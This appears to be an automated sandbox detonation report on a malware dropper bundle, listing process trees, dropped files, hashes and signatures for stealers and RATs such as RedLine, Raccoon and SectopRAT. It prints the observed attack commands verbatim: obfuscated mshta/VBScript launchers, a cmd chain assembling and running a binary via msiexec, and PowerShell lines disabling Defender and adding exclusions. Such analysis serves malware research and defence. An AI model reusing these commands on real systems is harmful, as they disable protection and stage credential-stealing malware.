"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed0911cd5800a45.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 464
Network
Files
\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\libwinpthread-1.dll
\Users\Admin\AppData\Local\Temp\7zS8763E087\libgcc_s_dw2-1.dll
\Users\Admin\AppData\Local\Temp\7zS8763E087\libcurl.dll
\Users\Admin\AppData\Local\Temp\7zS8763E087\libcurlpp.dll
\Users\Admin\AppData\Local\Temp\7zS8763E087\libstdc++-6.dll
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe
\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe
C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp
C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\_isetup\_shfoldr.dll
C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
120s
Max time network
153s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
Raccoon family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1144 set thread context of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe |
| PID 1768 set thread context of 852 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe |
| PID 4684 set thread context of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331540431966" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
